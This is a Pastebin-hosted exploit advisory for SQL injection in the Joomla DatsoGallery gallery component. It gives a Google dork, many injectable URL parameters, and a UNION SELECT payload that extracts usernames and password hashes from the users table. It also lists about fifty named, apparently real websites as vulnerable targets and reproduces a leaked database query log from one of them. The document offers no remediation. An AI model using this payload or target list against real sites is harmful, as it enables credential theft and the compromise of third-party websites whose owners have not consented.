Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla DatsoGallery Components 3.4.4 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : datso.fr
- # Software Download Link : datso.fr/products.html
- # Software Information Link : extensions.joomla.org/extension/datsogallery/
- # Software Affected Versions : 3.4.4 and previous versions
- 1.3.6.1 - 1.3.8 ~ 1.5 ~ 1.14 ~ 1.6 ~ 1.6.2 - 1.7.1 - 1.20 - 1.8.8 - 1.8.4 - 1.8.9 - 1.9.5
- # Software Prices : 20$ - 60$ - 120$ - 240$
- # Software Technical Requirements :
- DatsoGallery Multilingual is a native Joomla! and Mambo 4.6.x gallery component
- DatsoGallery Multilingual is a native Joomla! and Mambo [ No Version ] gallery component
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:''/index.php?option=com_datsogallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # Old Similar CVE => CVE-2008-1540 => nvd.nist.gov/vuln/detail/CVE-2008-1540
- # Old Similar CVE => CVE-2008-5208 => cvedetails.com/cve/CVE-2008-5208/
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- DatsoGallery component help you quickly and effortlessly create a multi-functional
- photo gallery. The intuitive interface makes it easy to manage the component and its content.
- A lot of settings allows you to organize the gallery, meet within acceptable to your requirements.
- It's a powerful image gallery component, which help you quickly and effortlessly
- create a beautiful and multi-functional photo gallery on your web site.
- ####################################################################
- # Impact :
- ***********
- Joomla DatsoGallery 3.4.4 and other versions -
- component for Joomla is prone to an SQL-injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_datsogallery&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=detail&id=[SQL Injection]
- /index.php?option=com_datsogallery&func=wmark&oid=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&id=[SQL Injection]
- /index.php?option=com_datsogallery&task=image&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=detail&catid=[ID-NUMBER]&id=[ID-NUMBER]&Itemid=&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&task=sbox&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw
- /index.php?option=com_datsogallery&func=slideshow&catid=[ID-NUMBER]&id=[SQL Injection]&format=raw
- /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[SQL Injection]
- /index.php?option=com_datsogallery&func=download&id=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&task=downloads&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=[SQL Injection]
- /index.php?option=com_datsogallery&func=lastadded&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=viewcategory&catid=[ID-NUMBER]&startpage=[SQL Injection]
- /index.php?option=com_datsogallery&Itemid=[SQL Injection]&func=special&sorting=lastcomment
- /index.php?option=com_datsogallery&Itemid=[ID-NUMBER]&func=detail&catid=[ID-NUMBER]&id=[SQL Injection]&lang=hu
- # Information Disclosure Exploit :
- *****************************
- /administrator/components/com_datsogallery/datsogallery.xml
- # Example SQL Injection Payload :
- *******************************
- 'union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] fcassan.fr/index.php?option=com_datsogallery&Itemid=0&func=detail&id=2219%27
- [+] prapodnichkennel.hu/index.php?option=com_datsogallery&Itemid=40&func=detail&catid=2&id=47%27
- [+] abusheikha.com/ds/index.php?option=com_datsogallery&task=image&catid=1&id=4&Itemid=150%27
- [+] aziendaagricolagiuliana.it/index.php?option=com_datsogallery&func=slideshow&catid=7&id=136&format=raw
- [+] elmigraphic.ir/index.php?option=com_datsogallery&task=sbox&catid=9&id=42&format=raw
- [+] istitutoplateja.it/sct/index.php?option=com_datsogallery&Itemid=55&func=viewcategory&catid=8%27
- [+] levissi.com/levissi/index.php?option=com_datsogallery&Itemid=27&func=detail&id=63%27
- [+] en.kamieniarstwo.rzeszow.pl/index.php?option=com_datsogallery&Itemid=42&func=detail&id=196%27
- [+] otelparpali.com/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=2&id=31%27
- [+] dunyaengelliler.org.tr/index.php?option=com_datsogallery&func=detail&catid=2&id=64&Itemid=6%27
- [+] rehberturk.de/index.php?option=com_datsogallery&Itemid=33&func=viewcategory&catid=7%27
- [+] grupobetel.com.co/granos.grupobetel.com.co/index.php?option=com_datsogallery&func=slideshow&catid=1&id=12&format=raw
- [+] akmedder.org.tr/index.php?option=com_datsogallery&view=image&catid=5&id=60&Itemid=164%27
- [+] ecet-egy.com/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=6&id=100%27
- [+] comunebreme.it/index.php?option=com_datsogallery&func=viewcategory&catid=2&Itemid=208%27
- [+] novapekaren.sk/index.php?option=com_datsogallery&Itemid=57&func=detail&id=2258%27
- [+] kopaonik-komita.com/index.php?option=com_datsogallery&func=special&sorting=lastadd&Itemid=1%27
- [+] mmgalway.com/index.php?option=com_datsogallery&Itemid=7&func=viewcategory&catid=1%27
- [+] xn--b1apfhdpdb.xn--p1ai/index.php?option=com_datsogallery&Itemid=42%27
- [+] agrodam.cz/hokej/index.php?option=com_datsogallery&func=download&id=291&Itemid=28%27
- [+] zusnovadubnica.sk/index.php/index.php?option=com_datsogallery&func=wmark&oid=77%27
- [+] lapiazzetta.org/index.php?option=com_datsogallery&Itemid=60&func=detail&catid=10&id=540%27
- [+] gynpaucin.sk/index.php?option=com_datsogallery&task=sbox&catid=4&id=442&format=raw
- [+] sadra-co.com/en/index.php?option=com_datsogallery&Itemid=75%27
- [+] solidaritemadagascar.fr/index.php?option=com_datsogallery&Itemid=123&func=detail&id=79%27
- [+] lift.ru/index.php?option=com_datsogallery&Itemid=44&func=detail&catid=7&id=46%27
- [+] roska-teplice.cz/index.php?option=com_datsogallery&Itemid=15&func=detail&catid=11&id=63%27
- [+] cclv38.free.fr/home/index.php?option=com_datsogallery&Itemid=48&func=detail&id=123%27
- [+] ulrg.ru/index.php?option=com_datsogallery&Itemid=116&func=detail&catid=4&id=969%27
- [+] muvfex.jo/index.php?option=com_datsogallery&func=lastadded&Itemid=93&limitstart=12%27
- [+] cms.elosoavila.org/index.php?option=com_datsogallery&Itemid=30&func=detail&catid=3&id=16%27
- [+] uk-plitka-ru.1gb.ru/index.php?option=com_datsogallery&func=detail&catid=88&id=454&Itemid=&Itemid=41%27
- [+] shkolatmz7.ru/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=38&id=394%27
- [+] k-s-i.org/index.php?option=com_datsogallery&Itemid=194&func=detail&catid=1&id=2%27
- [+] en.kamieniarstwo.rzeszow.pl/index.php?option=com_datsogallery&Itemid=42&func=viewcategory&catid=7%27
- [+] tkd.ee/old/index.php?option=com_datsogallery&Itemid=72&func=viewcategory&catid=145&startpage=10%27
- [+] levissi.com/levissi/index.php?option=com_datsogallery&Itemid=27&func=detail&id=72%27
- [+] kevserisi.com.tr/index.php?option=com_datsogallery&func=viewcategory&catid=12&Itemid=139%27
- [+] remarose.etouchsite.com/index.php?option=com_datsogallery&task=sbox&catid=8&id=149&format=raw
- [+] gaspargabor.festomester.hu/ggjoomla/index.php?option=com_datsogallery&Itemid=30&func=special&sorting=lastcomment
- [+] joomla.demo.c4.cz/index.php?option=com_datsogallery&Itemid=10%27
- [+] bonusclub.cz/index.php?option=com_datsogallery&Itemid=0&func=detail&catid=1&id=4%27
- [+] gss.hu/index.php?option=com_datsogallery&Itemid=39&func=viewcategory&catid=2&Itemid=42%27
- [+] cuvelier-roy.com/index.php%3Foption=com_datsogallery&Itemid=38&func=viewcategory&catid=2.html
- [+] blhovce.sk/old/index.php?option=com_datsogallery&Itemid=9&func=detail&catid=9&id=158&lang=hu
- [+] roska-teplice.cz/index.php?option=com_datsogallery&Itemid=1&func=detail&catid=6&id=39%27
- ####################################################################
- # Example SQL Database Errors :
- ****************************
- 30 queries executed
- 1
- SET sql_mode = 'MYSQL40'
- 2
- SELECT folder, element, published, params
- FROM jos_mambots
- WHERE published >= 1
- AND access <= 0
- AND folder = 'system'
- ORDER BY ordering
- 3
- SELECT template
- FROM jos_templates_menu
- WHERE client_id = 0
- AND ( menuid = 0 OR menuid = 99999999 )
- ORDER BY menuid DESC
- LIMIT 1
- 4
- DELETE FROM jos_session
- WHERE (
- ( time < '1550015982' )
- AND guest = 0
- AND gid > 0
- ) OR (
- ( time < '1550015982' )
- AND guest = 1
- AND userid = 0
- )
- 5
- SELECT *
- FROM jos_menu
- WHERE published = 1 AND
- link LIKE 'index.php?option=com\_datsogallery%'
- 6
- select a.*, cc.name as category from jos_datsogallery as a, jos_datsogallery_catg as cc
- where a.catid=cc.cid and a.id=2219 and cc.access<='0'
- 7
- select * from jos_datsogallery_catg where cid=141 and published=1 and access<='0'
- 8
- select * from jos_datsogallery_catg where cid=3 and published=1 and access<='0'
- 9
- select c.access from jos_datsogallery_catg as c left join jos_datsogallery as a on a.catid=c.cid where a.id= '2219'
- 10
- select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum, a.published,
- a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a left join jos_users
- as u on u.username=a.owner where a.id='2219' and a.approved=1
- 11
- select a.id, a.catid, a.imgtitle, a.imgauthor, a.imgtext, a.imgdate, a.imgcounter, a.imgvotes, a.imgvotesum,
- a.published, a.imgoriginalname, a.imgfilename, a.imgthumbname, a.owner, u.id FROM jos_datsogallery as a
- left join jos_users as u on u.username=a.owner where a.id='2219' and a.approved=1
- 12
- SELECT id, imgfilename FROM jos_datsogallery WHERE catid=141 ORDER BY id DESC
- 13
- UPDATE jos_datsogallery SET imgcounter='286' WHERE id=2219
- 14
- SELECT a.*
- FROM jos_components AS a
- WHERE ( a.admin_menu_link = 'option=com_syndicate' OR a.admin_menu_link =
- 'option=com_syndicate&hidemainmenu=1' )
- AND a.option = 'com_syndicate'
- 15
- SELECT id, title, module, position, content, showtitle, params
- FROM jos_modules AS m
- INNER JOIN jos_modules_menu AS mm ON mm.moduleid = m.id
- WHERE m.published = 1
- AND m.access <= 0
- AND m.client_id != 1
- AND ( mm.menuid = 0 )
- ORDER BY ordering
- 16
- SELECT m.*
- FROM jos_menu AS m
- WHERE menutype = 'topmenu'
- AND published = 1
- AND access <= 0
- AND parent = 0
- ORDER BY ordering
- 17
- SELECT m.*
- FROM jos_menu AS m
- WHERE menutype = 'mainmenu'
- AND published = 1
- AND access <= 0
- ORDER BY parent, ordering
- 18
- SELECT COUNT( id )
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- 19
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=1'
- 20
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=13'
- 21
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=12'
- 22
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=14'
- 23
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=15'
- 24
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=16'
- 25
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=17'
- 26
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=18'
- 27
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=23'
- 28
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=38'
- 29
- SELECT id
- FROM jos_menu
- WHERE type = 'content_item_link'
- AND published = 1
- AND link = 'index.php?option=com_content&task=view&id=46'
- 30
- SELECT id, name, link, parent, type, menutype, access
- FROM jos_menu
- WHERE published = 1
- AND access <= 0
- ORDER BY menutype, parent, ordering
- Strict Standards: Non-static method JSite::getMenu() should not be called
- statically in /home/abusheik/public_html/ds/components
- /com_datsogallery/datsogallery.php on line 20
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment